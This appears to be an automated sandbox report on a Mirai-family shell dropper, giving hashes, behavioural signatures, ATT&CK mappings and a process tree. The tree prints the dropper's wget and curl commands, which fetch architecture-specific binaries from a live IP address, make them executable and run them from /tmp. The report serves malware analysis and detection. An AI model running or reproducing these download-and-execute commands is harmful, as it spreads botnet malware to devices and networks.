Analysis
-
max time kernel
150s -
max time network
162s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
07/12/2024, 04:11
Static task
static1
Behavioral task
behavioral1
Sample
jewn.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
jewn.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
jewn.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
jewn.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
jewn.sh
-
Size
1KB
-
MD5
720a5e4e44f99b055d00bf5be3948b2d
-
SHA1
684fa717c79344199982029892b768a335682f57
-
SHA256
c5529040db9e0e5cbe26dac8162859d8867ae845a6b2fdfdcad8ee2cfe63ff1d
-
SHA512
c9b4f2f2e6f9e0c66421ae95641f013e7be7652e9b4787cc84cab88e24fe18e471b77249de3c210fe410e16312dbef499b5e81b8d03ffb4ad1796f5dc1a04b1a
Malware Config
Extracted
mirai
KURC
Extracted
mirai
KURC
Extracted
mirai
KURC
Signatures
-
Mirai family
-
Contacts a large (92937) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 832 chmod 717 chmod 742 chmod 819 chmod 791 chmod 845 chmod 864 chmod 701 chmod 761 chmod 772 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/jewn 702 jewn /tmp/jewn 719 jewn /tmp/jewn 744 jewn /tmp/jewn 763 jewn /tmp/jewn 773 jewn /tmp/jewn 792 jewn /tmp/jewn 820 jewn /tmp/jewn 833 jewn /tmp/jewn 846 jewn /tmp/jewn 865 jewn -
Modifies Watchdog functionality 1 TTPs 10 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog jewn File opened for modification /dev/misc/watchdog jewn File opened for modification /dev/misc/watchdog jewn File opened for modification /dev/watchdog jewn File opened for modification /dev/misc/watchdog jewn File opened for modification /dev/watchdog jewn File opened for modification /dev/watchdog jewn File opened for modification /dev/misc/watchdog jewn File opened for modification /dev/watchdog jewn File opened for modification /dev/watchdog jewn -
Enumerates active TCP sockets 1 TTPs 4 IoCs
Gets active TCP sockets from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn -
Writes file to system bin folder 10 IoCs
description ioc Process File opened for modification /sbin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /bin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /sbin/watchdog jewn File opened for modification /bin/watchdog jewn File opened for modification /bin/watchdog jewn File opened for modification /bin/watchdog jewn File opened for modification /bin/watchdog jewn -
Changes its process name 5 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself icztgpsvwoxD#5. 792 jewn Changes the process name, possibly in an attempt to hide itself mxvlnjpvEqov- 820 jewn Changes the process name, possibly in an attempt to hide itself axBubwsCqhAlkwDz# 833 jewn Changes the process name, possibly in an attempt to hide itself DyguevoFzkkodEkv<( 846 jewn Changes the process name, possibly in an attempt to hide itself rrnjpfrxpBvvpejE!0 865 jewn -
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Reads system network configuration 1 TTPs 4 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn File opened for reading /proc/net/tcp jewn -
description ioc Process File opened for reading /proc/143/fd jewn File opened for reading /proc/466/fd jewn File opened for reading /proc/794/fd jewn File opened for reading /proc/278/fd jewn File opened for reading /proc/279/fd jewn File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/852/fd jewn File opened for reading /proc/223/fd jewn File opened for reading /proc/275/fd jewn File opened for reading /proc/837/fd jewn File opened for reading /proc/306/fd jewn File opened for reading /proc/321/fd jewn File opened for reading /proc/self/auxv curl File opened for reading /proc/1/fd jewn File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/1/fd jewn File opened for reading /proc/278/fd jewn File opened for reading /proc/279/fd jewn File opened for reading /proc/466/fd jewn File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/275/fd jewn File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/279/fd jewn File opened for reading /proc/143/fd jewn File opened for reading /proc/407/fd jewn File opened for reading /proc/669/fd jewn File opened for reading /proc/165/fd jewn File opened for reading /proc/223/fd jewn File opened for reading /proc/343/fd jewn File opened for reading /proc/143/fd jewn File opened for reading /proc/self/auxv curl File opened for reading /proc/282/fd jewn File opened for reading /proc/621/fd jewn File opened for reading /proc/306/fd jewn File opened for reading /proc/321/fd jewn File opened for reading /proc/343/fd jewn File opened for reading /proc/407/fd jewn File opened for reading /proc/668/fd jewn File opened for reading /proc/669/fd jewn File opened for reading /proc/self/auxv curl File opened for reading /proc/466/fd jewn File opened for reading /proc/321/fd jewn File opened for reading /proc/307/fd jewn File opened for reading /proc/826/fd jewn File opened for reading /proc/421/fd jewn File opened for reading /proc/668/fd jewn File opened for reading /proc/1/fd jewn File opened for reading /proc/143/fd jewn File opened for reading /proc/275/fd jewn File opened for reading /proc/282/fd jewn File opened for reading /proc/283/fd jewn File opened for reading /proc/407/fd jewn File opened for reading /proc/165/fd jewn File opened for reading /proc/307/fd jewn File opened for reading /proc/self/auxv curl File opened for reading /proc/282/fd jewn File opened for reading /proc/278/fd jewn File opened for reading /proc/283/fd jewn File opened for reading /proc/407/fd jewn File opened for reading /proc/668/fd jewn File opened for reading /proc/797/fd jewn File opened for reading /proc/621/fd jewn File opened for reading /proc/621/fd jewn File opened for reading /proc/self/auxv curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 716 cat 705 wget 706 curl -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jew.mips wget File opened for modification /tmp/jew.arm6 curl File opened for modification /tmp/jew.sh4 wget File opened for modification /tmp/jew.x86 wget File opened for modification /tmp/jew.mips curl File opened for modification /tmp/jew.arm7 wget File opened for modification /tmp/jew.m68k wget File opened for modification /tmp/jew.arm4 curl File opened for modification /tmp/jew.arm5 curl File opened for modification /tmp/jew.arm7 curl File opened for modification /tmp/jew.ppc wget File opened for modification /tmp/jew.x86 curl File opened for modification /tmp/jewn jewn.sh File opened for modification /tmp/jew.mpsl wget File opened for modification /tmp/jew.mpsl curl File opened for modification /tmp/jew.arm5 wget File opened for modification /tmp/jew.arm6 wget File opened for modification /tmp/jew.ppc curl File opened for modification /tmp/jew.m68k curl File opened for modification /tmp/jew.sh4 curl
Processes
-
/tmp/jewn.sh/tmp/jewn.sh1⤵
- Writes file to tmp directory
PID:668 -
/usr/bin/wgetwget http://104.234.240.71/bins/jew.x862⤵
- Writes file to tmp directory
PID:674
-
-
/usr/bin/curlcurl -O http://104.234.240.71/bins/jew.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:692
-
-
/bin/catcat jew.x862⤵PID:700
-
-
/bin/chmodchmod +x jewn jewn.sh jew.x86 systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-K8oM9z2⤵
- File and Directory Permissions Modification
PID:701
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
PID:702
-
-
/usr/bin/wgetwget http://104.234.240.71/bins/jew.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:705
-
-
/usr/bin/curlcurl -O http://104.234.240.71/bins/jew.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:706
-
-
/bin/catcat jew.mips2⤵
- System Network Configuration Discovery
PID:716
-
-
/bin/chmodchmod +x jew.mips jewn jewn.sh jew.x86 systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-K8oM9z2⤵
- File and Directory Permissions Modification
PID:717
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
PID:719
-
-
/usr/bin/wgetwget http://104.234.240.71/bins/jew.mpsl2⤵
- Writes file to tmp directory
PID:721
-
-
/usr/bin/curlcurl -O http://104.234.240.71/bins/jew.mpsl2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:731
-
-
/bin/catcat jew.mpsl2⤵PID:741
-
-
/bin/chmodchmod +x jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-K8oM9z2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
PID:744
-
-
/usr/bin/wgetwget http://104.234.240.71/bins/jew.arm42⤵PID:746
-
-
/usr/bin/curlcurl -O http://104.234.240.71/bins/jew.arm42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:752
-
-
/bin/catcat jew.arm42⤵PID:759
-
-
/bin/chmodchmod +x jew.arm4 jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-K8oM9z2⤵
- File and Directory Permissions Modification
PID:761
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
PID:763
-
-
/usr/bin/wgetwget http://104.234.240.71/bins/jew.arm52⤵
- Writes file to tmp directory
PID:764
-
-
/usr/bin/curlcurl -O http://104.234.240.71/bins/jew.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:768
-
-
/bin/catcat jew.arm52⤵PID:771
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-K8oM9z2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
PID:773
-
-
/usr/bin/wgetwget http://104.234.240.71/bins/jew.arm62⤵
- Writes file to tmp directory
PID:774
-
-
/usr/bin/curlcurl -O http://104.234.240.71/bins/jew.arm62⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:780
-
-
/bin/catcat jew.arm62⤵PID:789
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.arm6 jew.mips jew.mpsl jewn jewn.sh jew.x86 systemd-private-30bdf15447424eac9e960936d0a07f4a-systemd-timedated.service-K8oM9z2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
PID:792
-
-
/usr/bin/wgetwget http://104.234.240.71/bins/jew.arm72⤵
- Writes file to tmp directory
PID:796
-
-
/usr/bin/curlcurl -O http://104.234.240.71/bins/jew.arm72⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:810
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.mips jew.mpsl jewn jewn.sh jew.x862⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:820
-
-
/usr/bin/wgetwget http://104.234.240.71/bins/jew.ppc2⤵
- Writes file to tmp directory
PID:827
-
-
/usr/bin/curlcurl -O http://104.234.240.71/bins/jew.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.x862⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:833
-
-
/usr/bin/wgetwget http://104.234.240.71/bins/jew.m68k2⤵
- Writes file to tmp directory
PID:839
-
-
/usr/bin/curlcurl -O http://104.234.240.71/bins/jew.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:843
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.m68k jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.x862⤵
- File and Directory Permissions Modification
PID:845
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:846
-
-
/usr/bin/wgetwget http://104.234.240.71/bins/jew.sh42⤵
- Writes file to tmp directory
PID:853
-
-
/usr/bin/curlcurl -O http://104.234.240.71/bins/jew.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:858
-
-
/bin/chmodchmod +x jew.arm4 jew.arm5 jew.arm6 jew.arm7 jew.m68k jew.mips jew.mpsl jewn jewn.sh jew.ppc jew.sh4 jew.x862⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/jewn./jewn2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
- Reads runtime system information
PID:865
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60KB
MD5c790dde9d4762b3e82c0d9e41df91fb9
SHA1341070d0148f795a2b6dd1d988e497f4084bebe7
SHA256e8ca93ec9f737481e131b64981ebf0212958dd1b43ef36a944869ae0f603e6f1
SHA512ffa49eae4d60f3ff6f1b0fe053c5f8293e6eca3737d2805e464336376ca6f705da949936530c595bc33b4c49b7a80d8672f03414f027421394436b26c471697f
-
Filesize
125KB
MD5e20014e57c7c30bb2bda9aa339fc4aff
SHA1a49e3de31275f2f55351494da979e4f9c7e97f3c
SHA256c7b2789a6ad425fc8bc48a6b496a2e2d8951ea80a1c908fc7914e99a11674150
SHA512b6db6b572bed7f1bfc9986a3157f8bb8e07ac31b19df39e7b2182c5d432b87a4165584801d0d3a320e93c8bb1b3cd582fcdff4531af2df75523207444673f2df
-
Filesize
118KB
MD5e763ac9455273a0ebd7773d550965150
SHA10b454e4cd734b07ee063c863fe44835653338f35
SHA2564e566bbc9fba17867653b24298e8258311d7ac6f089b28029886e75ed6985594
SHA5127e545ca2faf134e6a5841060791d9bd0a8bffcb3a1d1c056f6b62ac7ad0fb87aff3781ca628e4678fd7d55040d31b186c572270a5509efd9f081e44702c878b1
-
Filesize
211B
MD5bf7b89e47bae293118c020c809c6b64f
SHA10ce398102e0add27eae4027b8785e1a925d44d5d
SHA256d299a926576581b97be372dd08ea722eb47e9d634b5a07669993b42efbc1a5bd
SHA5123ddf7c5a29121f52f3bf2023a86b9f1787ac2e4cd2691d441528e7889868a1c4d97c153f1d1b6ea4a86fb7b2a9cad9888324dcdf92390c8932e17ba486a54409
-
Filesize
50KB
MD57b9dbd5b2bcb6ea0b69a6cd1310f7d08
SHA19a8fe81ab4fcaa47b7a228844c94814724bd2532
SHA256ff77cdfd76b12940ec6a3d998441cdf399c956f51f5a311c614b59d109bf49d5
SHA512dc0d68aca50d2f186272a5ad2d653454c2aca00a5400da8a91b1d9bcd2dd81f56e121dd4856109777b013fe131d11c23d044819c6c973ea50723617731ba8985
-
Filesize
74KB
MD5f0b77c155537d308033ad7b7294b92c9
SHA11b7c208de04ee6b2f62f7f58f4666bd8cecfbaa7
SHA25607ae7eb36dc1201da22a0ba23e5a4929e78ace0579c1381de021d7cf8c978952
SHA512d475a88b9c68aa75cbcb24cb29254b42638e0d712079a52c3e271a92df8494b1262eaa732d92ea5d0134f56cc1660289d6353d06e7d8a9af19c32b35d5c5ce24